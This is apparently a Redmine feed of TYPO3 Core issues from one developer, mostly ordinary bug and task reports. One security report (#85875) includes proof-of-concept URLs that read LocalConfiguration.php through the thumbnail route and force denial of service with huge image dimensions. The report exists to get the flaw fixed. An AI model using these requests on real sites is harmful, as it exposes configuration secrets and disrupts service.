TYPO3 Forge: Issues
http://forge.typo3.org/
2024-03-14T17:36:06Z, TYPO3 Forge (Redmine)

TYPO3 Core - Bug #103400 (Under Review): Avoid mapping route values that are out of scope
http://forge.typo3.org/issues/103400
2024-03-14T17:36:06Z, Oliver Hader (oliver.hader@typo3.org)

TYPO3 Core - Bug #89392 (Closed): Fix composer definitions
http://forge.typo3.org/issues/89392
2019-10-10T15:54:25Z, Oliver Hader (oliver.hader@typo3.org)
<pre>
The typo3/cms-core package of which you are a maintainer has
failed to update due to invalid data contained in your composer.json.
Please address this as soon as possible since the package stopped updating.
It is recommended that you use `composer validate` to check for errors when you
change your composer.json.
Below is the full update log which should highlight errors as
"Skipped branch ...":
[Composer\Repository\InvalidRepositoryException]: Some branches contained invalid data and were discarded, it is advised to review the log and fix any issues present in branches
Reading composer.json of typo3/cms-core (v10.1.0)
Found cached composer.json of typo3/cms-core (v10.1.0)
Reading composer.json of typo3/cms-core (v10.0.0)
Found cached composer.json of typo3/cms-core (v10.0.0)
Reading composer.json of typo3/cms-core (v9.5.9)
Found cached composer.json of typo3/cms-core (v9.5.9)
Reading composer.json of typo3/cms-core (v9.5.8)
Found cached composer.json of typo3/cms-core (v9.5.8)
Reading composer.json of typo3/cms-core (v9.5.7)
Found cached composer.json of typo3/cms-core (v9.5.7)
Reading composer.json of typo3/cms-core (v9.5.6)
Found cached composer.json of typo3/cms-core (v9.5.6)
Reading composer.json of typo3/cms-core (v9.5.5)
Found cached composer.json of typo3/cms-core (v9.5.5)
Reading composer.json of typo3/cms-core (v9.5.4)
Found cached composer.json of typo3/cms-core (v9.5.4)
Reading composer.json of typo3/cms-core (v9.5.3)
Found cached composer.json of typo3/cms-core (v9.5.3)
Reading composer.json of typo3/cms-core (v9.5.2)
Found cached composer.json of typo3/cms-core (v9.5.2)
Reading composer.json of typo3/cms-core (v9.5.1)
Found cached composer.json of typo3/cms-core (v9.5.1)
Reading composer.json of typo3/cms-core (v9.5.0)
Found cached composer.json of typo3/cms-core (v9.5.0)
Reading composer.json of typo3/cms-core (v9.4.0)
Found cached composer.json of typo3/cms-core (v9.4.0)
Reading composer.json of typo3/cms-core (v9.3.3)
Found cached composer.json of typo3/cms-core (v9.3.3)
Reading composer.json of typo3/cms-core (v9.3.2)
Found cached composer.json of typo3/cms-core (v9.3.2)
Reading composer.json of typo3/cms-core (v9.3.1)
Found cached composer.json of typo3/cms-core (v9.3.1)
Reading composer.json of typo3/cms-core (v9.3.0)
Found cached composer.json of typo3/cms-core (v9.3.0)
Reading composer.json of typo3/cms-core (v9.2.1)
Found cached composer.json of typo3/cms-core (v9.2.1)
Reading composer.json of typo3/cms-core (v9.2.0)
Found cached composer.json of typo3/cms-core (v9.2.0)
Reading composer.json of typo3/cms-core (v9.1.0)
Found cached composer.json of typo3/cms-core (v9.1.0)
Reading composer.json of typo3/cms-core (v9.0.0)
Found cached composer.json of typo3/cms-core (v9.0.0)
Reading composer.json of typo3/cms-core (v8.7.27)
Found cached composer.json of typo3/cms-core (v8.7.27)
Reading composer.json of typo3/cms-core (v8.7.26)
Found cached composer.json of typo3/cms-core (v8.7.26)
Reading composer.json of typo3/cms-core (v8.7.25)
Found cached composer.json of typo3/cms-core (v8.7.25)
Reading composer.json of typo3/cms-core (v8.7.24)
Found cached composer.json of typo3/cms-core (v8.7.24)
Reading composer.json of typo3/cms-core (v8.7.23)
Found cached composer.json of typo3/cms-core (v8.7.23)
Reading composer.json of typo3/cms-core (v8.7.22)
Found cached composer.json of typo3/cms-core (v8.7.22)
Reading composer.json of typo3/cms-core (v8.7.21)
Found cached composer.json of typo3/cms-core (v8.7.21)
Reading composer.json of typo3/cms-core (v8.7.20)
Found cached composer.json of typo3/cms-core (v8.7.20)
Reading composer.json of typo3/cms-core (v8.7.19)
Found cached composer.json of typo3/cms-core (v8.7.19)
Reading composer.json of typo3/cms-core (v8.7.18)
Found cached composer.json of typo3/cms-core (v8.7.18)
Reading composer.json of typo3/cms-core (v8.7.17)
Found cached composer.json of typo3/cms-core (v8.7.17)
Reading composer.json of typo3/cms-core (v8.7.16)
Found cached composer.json of typo3/cms-core (v8.7.16)
Reading composer.json of typo3/cms-core (v8.7.15)
Found cached composer.json of typo3/cms-core (v8.7.15)
Reading composer.json of typo3/cms-core (v8.7.14)
Found cached composer.json of typo3/cms-core (v8.7.14)
Reading composer.json of typo3/cms-core (v8.7.13)
Found cached composer.json of typo3/cms-core (v8.7.13)
Reading composer.json of typo3/cms-core (v8.7.12)
Found cached composer.json of typo3/cms-core (v8.7.12)
Reading composer.json of typo3/cms-core (v8.7.11)
Found cached composer.json of typo3/cms-core (v8.7.11)
Reading composer.json of typo3/cms-core (v8.7.10)
Found cached composer.json of typo3/cms-core (v8.7.10)
Reading composer.json of typo3/cms-core (v8.7.9)
Found cached composer.json of typo3/cms-core (v8.7.9)
Reading composer.json of typo3/cms-core (v8.7.8)
Found cached composer.json of typo3/cms-core (v8.7.8)
Reading composer.json of typo3/cms-core (v8.7.7)
Found cached composer.json of typo3/cms-core (v8.7.7)
Reading composer.json of typo3/cms-core (master)
Importing branch master (dev-master)
Skipped branch master, Invalid package information:
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
Reading composer.json of typo3/cms-core (8.7)
Found cached composer.json of typo3/cms-core (8.7.x-dev)
Reading composer.json of typo3/cms-core (9.2)
Found cached composer.json of typo3/cms-core (9.2.x-dev)
Reading composer.json of typo3/cms-core (9.3)
Found cached composer.json of typo3/cms-core (9.3.x-dev)
Reading composer.json of typo3/cms-core (9.5)
Found cached composer.json of typo3/cms-core (9.5.x-dev)
</pre>
<p><code>composer validate</code> in typo3/sysext/core:</p>
<pre>
composer validate
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
./composer.json is valid, but with a few warnings
See https://getcomposer.org/doc/04-schema.md for details on the schema
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
</pre>

TYPO3 Core - Bug #86923 (Closed): Symfony expressions/conditions doesn't work in user-tsconfig
http://forge.typo3.org/issues/86923
2018-11-14T08:50:52Z, Oliver Hader (oliver.hader@typo3.org)

TYPO3 Core - Bug #85875 (Closed): Issues in ThumbnailController
http://forge.typo3.org/issues/85875
2018-08-16T18:33:06Z, Oliver Hader (oliver.hader@typo3.org)
<ul>
<li>information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)</li>
<li>denial of service (dimensions, basically whole configuration can be arbitrary)</li>
</ul>
<p>Introduced in <a class="external" href="https://review.typo3.org/#/c/56765/">https://review.typo3.org/#/c/56765/</a> - not released yet to 9.4.0 nor 8.7.19</p>
<p>Solution: Add HMAC to all HTTP request parameters.</p>
<a name="PoC"></a>
<h2>PoC</h2>
<p>XSRF Token has to be adjusted in the links below</p>
<a name="Information-Disclosure"></a>
<h3>Information Disclosure</h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>
<a name="Denial-of-Service"></a>
<h3>Denial of Service</h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>

TYPO3 Core - Bug #81747 (Closed): Copying workspace version record fails
http://forge.typo3.org/issues/81747
2017-06-29T18:16:07Z, Oliver Hader (oliver.hader@typo3.org)
<p>Copying workspace version records fails with a Doctrine DBAL exception due to using computed properties directly in the database - which do not exist. This misbehavior has been introduced in issue <a class="issue tracker-4 status-5 priority-4 priority-default closed" title="Task: Wrap doesRecordExist in new method (Closed)" href="http://forge.typo3.org/issues/79515">#79515</a> which switched to use BackendUtility::workspaceOL() without further sanitization.</p>
<p>Example of Doctrine DBAL exception:<br /><pre>
Doctrine\DBAL\Exception\InvalidFieldNameException: An exception occurred while executing 'SELECT `uid`, `pid`, `t3ver_oid`, `t3ver_id`, `t3ver_wsid`, `t3ver_label`, `t3ver_state`, `t3ver_stage`, `t3ver_count`, `t3ver_tstamp`, `t3ver_move_id`, `t3_origuid`, `tstamp`, `crdate`, `cruser_id`, `editlock`, `hidden`, `sorting`, `CType`, `header`, `header_position`, `rowDescription`, `bodytext`, `bullets_type`, `uploads_description`, `uploads_type`, `assets`, `image`, `imagewidth`, `imageorient`, `imagecols`, `imageborder`, `media`, `layout`, `frame_class`, `deleted`, `cols`, `spaceBefore`, `spaceAfter`, `space_before_class`, `space_after_class`, `records`, `pages`, `starttime`, `endtime`, `colPos`, `subheader`, `fe_group`, `header_link`, `image_zoom`, `header_layout`, `list_type`, `sectionIndex`, `linkToTop`, `file_collections`, `filelink_size`, `filelink_sorting`, `target`, `date`, `recursive`, `imageheight`, `sys_language_uid`, `pi_flexform`, `accessibility_title`, `accessibility_bypass`, `accessibility_bypass_text`, `l18n_parent`, `l18n_diffsource`, `l10n_source`, `selected_categories`, `category_field`, `table_class`, `table_caption`, `table_delimiter`, `table_enclosure`, `table_header_position`, `table_tfoot`, `tx_irretutorial_1nff_hotels`, `tx_irretutorial_1ncsv_hotels`, `tx_irretutorial_flexform`, `l10n_state`, `categories`, `_ORIG_pid` FROM `tt_content` WHERE (`pid` = ?) AND (`t3ver_oid` = ?) AND (`t3ver_wsid` = ?) AND (`tt_content`.`deleted` = 0)' with params [-1, 300, 1]:
</pre></p>

TYPO3 Core - Task #80149 (Closed): Remove $GLOBALS['TYPO3_CONF_VARS']['FE']['pageOverlayFields']
http://forge.typo3.org/issues/80149
2017-03-06T12:27:17Z, Oliver Hader (oliver.hader@typo3.org)
<p>The configuration $GLOBALS['TYPO3_CONF_VARS']['FE']['pageOverlayFields']<br />is removed from the default configuration as well as from the overlay<br />handling in PageRepository and RootlineUtility. This setting has been<br />used to determine overlay fields in the table pages_language_overlay at<br />a time in the runtime processing when the complete TCA was not fully<br />available. Since the allowLanguageSynchronization possibility has been<br />integrated into TYPO3 CMS 8, l10n_mode was available already and the TCA<br />is loaded as well, the pageOverlayFields settings are superfluous.</p>

TYPO3 Core - Task #69369 (Closed): EXT:form - Use property value instead of data for TEXTAREA, TE...
http://forge.typo3.org/issues/69369
2015-08-27T17:02:52Z, Oliver Hader (oliver.hader@typo3.org)
<p>The Form Objects (system extension "form") TEXTAREA, TEXTBLOCK, OPTION currently use <code>data</code> as property name to define default values. However, all other objects use <code>value</code>. Since <code>data</code> implies the possibility to use computed values, it shall be deprecated and <code>value</code> used instead.</p>

TYPO3 Core - Bug #47969 (Closed): Call to undefined function mime_content_type()
http://forge.typo3.org/issues/47969
2013-05-06T09:21:53Z, Oliver Hader (oliver.hader@typo3.org)
<p>Call to undefined function mime_content_type() on fetching the mime type of the favicon.<br />I'm still investigating the PHP versions and environment. However it looks like a superfluous regression from <a class="issue tracker-4 status-5 priority-4 priority-default closed" title="Task: Make mimetype-detection possible without finfo_file (pre-PHP-5.3, no pecl-fileinfo) (Closed)" href="http://forge.typo3.org/issues/46126">#46126</a></p>

TYPO3 Core - Bug #46530 (Closed): Crop-Scaled images have wrong file content type
http://forge.typo3.org/issues/46530
2013-03-22T09:57:25Z, Oliver Hader (oliver.hader@typo3.org)
The following scenario is given:
<ul>
<li>resize a 300dpi TIFF image to PNG using stdWrap/cObj</li>
<li>the 'fileExtension' configuration is not set ($fileArray['ext'] is empty)</li>
<li>the processed file csm_... has the file extension PNG</li>
<li>but the file content type is still TIFF, so the file was just renamed, but not converted to PNG</li>
</ul>
<p>Solution:<br />Since the processing task determines the accordant filename and file extension, the image processor (ImageMagick, ...) needs to know about that fact as well.</p>

TYPO3 Core - Bug #46205 (Closed): Cache file could not be written on concurrent actions
http://forge.typo3.org/issues/46205
2013-03-12T15:30:34Z, Oliver Hader (oliver.hader@typo3.org)
<p>I get several errors like</p>
<p><code>The cache file "htdocs/typo3temp/Cache/Data/t3lib_l10n/3e2cbbda0301cf592e5831ef26c56b7b" could not be written.</code></p>
<p>This happens while a scheduler process is running that imports data using t3lib_TCEmain/DataHandler and I'm trying to work in the backend.<br />I consider this kind of a race condition that e.g. in this case language caches are flushed too often if a new record gets persisted in the DataHandler.</p>
<p>I can reproduce this on my local machine (Mac OS X) and a staging server with Ubuntu 12.04.</p>

TYPO3 Core - Task #45676 (Rejected): Workspace references are not considered
http://forge.typo3.org/issues/45676
2013-02-20T21:32:35Z, Oliver Hader (oliver.hader@typo3.org)
<p>Workspace references for MM and IRRE records are not considered, since only the UID of the live record is considered (due to overlays).<br />Since this might(!) work in most cases for existing records that get modified in a workspace, it does not for records that are newly created. In this case, the "live record" is a workspace placeholder without any data.</p>
<p>MM and IRRE always need to use the most specific UID in references, which is the versioned record in this case.</p>

TYPO3 Core - Task #31274 (Closed): Disable file upload in form wizard
http://forge.typo3.org/issues/31274
2011-10-25T12:24:00Z, Oliver Hader (oliver.hader@typo3.org)
<p>Due to a wrong implementation the file upload feature in the form wizard will be disabled for the time being.</p>

TYPO3 Core - Bug #31120 (Closed): Add default csc-mailform DIV wrap
http://forge.typo3.org/issues/31120
2011-10-19T18:59:47Z, Oliver Hader (oliver.hader@typo3.org)
<p>A new form element does not have any class settings.<br />This issue reintroduces stdWrap possibilities for the new form system extension.</p>

TYPO3 Core - Bug #11163 (Closed): Actions performed on tabs are not executed on the correct works...
http://forge.typo3.org/issues/11163
2010-11-30T14:00:43Z, Oliver Hader (oliver.hader@typo3.org)
<p>Actions performed on tabs are not executed on the correct workspace</p>

TYPO3 Core - Bug #17001 (Closed): config.linkVars check doesn't allow negative ranges
http://forge.typo3.org/issues/17001
2007-02-17T11:05:42Z, Oliver Hader (oliver.hader@typo3.org)
<p>The newly introduced linkVars check in TYPO3 4.1 doesn't allow negative ranges.</p>
<p>Example:<br />config.linkVars = my_variable(1-5) is valid<br />config.linkVars = my_variable(-1-5) doesn't work<br />config.linkVars = my_variable(-1--3) doesn't work and looks very ugly</p>
<p>I suggest to use ".." as delimiter, e.g.<br />config.linkVars = my_variable(-1..-3)</p>
<p>Possibly it is allowed in TYPO3 4.2 to use config.linkVars = tx_myext_pi1[var](-1..-3), but we should change the delimiter from "-" to ".." now.<br />(issue imported from #M5009)</p>